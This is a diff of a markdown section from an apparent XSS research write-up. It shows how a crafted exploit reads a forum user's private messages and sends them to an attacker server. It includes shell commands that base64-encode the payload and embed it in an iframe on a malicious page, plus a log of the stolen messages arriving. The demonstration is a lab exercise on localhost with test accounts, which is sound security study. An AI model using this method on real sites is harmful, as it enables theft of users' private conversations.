centime/xss-paper/attacks.md

 III.
 Read a user's private conversations.
 -----------------------------------------

+So, here I hand-crafted an exploit[4].
+This is classic javascript programming, so I won't explain in detail, but here is the gist :

+    -request user/messages/inbox
+    -parse the response to get received message.
+We get title, author, and a link to the content -request each of thoses new links
+    -parse the response to get the content of each message -wrap it all in a serialized json, urlencode, and ship it in a GET request to our malicious website.

-Of course, like any exploit, this one is dirty as heck[4].
-But hey, it kind of works.
+Of course, like most exploits, this code isn't a piece of art.
+But hey, it works.

     base64 -w0 read-private.js > read-private.b64

     echo "<iframe src='http://localhost:8080/xss/$(cat payloads/read-private.b64)'></iframe>" > malicious-website/read-private.html
     cd malicious-website && python3 -m http.server 1337

-When someone (test2 in my case) visits localhost:1337/read-private.html, after a short while our malicious server receives another request :
+When someone (test2 in my case) visits localhost:1337/read-private.html, assuming he is already authenticated in the forum, our malicious server receives another request :

     "GET /%5B%0A%20%20%7B%0A%20%20%20%20%22author%22%3A%20%22test1%22%2C%0A%20%20%20%20%22title%22%3A%20%22%20Private%20conversation%20is%20private%20%22%2C%0A%20%20%20%20%22content%22%3A%20%22%20Or%20is%20it%20%3F%20%22%0A%20%20%7D%2C%0A%20%20%7B%0A%20%20%20%20%22author%22%3A%20%22test3%22%2C%0A%20%20%20%20%22title%22%3A%20%22%20Another%20%22%2C%0A%20%20%20%20%22content%22%3A%20%22%20%E2%80%9Cprivate%E2%80%9D%20conversation%20%22%0A%20%20%7D%2C%0A%20%20%7B%0A%20%20%20%20%22author%22%3A%20%22test3%22%2C%0A%20%20%20%20%22title%22%3A%20%22%20last%20%22%2C%0A%20%20%20%20%22content%22%3A%20%22%20of%20thoses%20%22%0A%20%20%7D%0A%5D HTTP/1.1" 404 -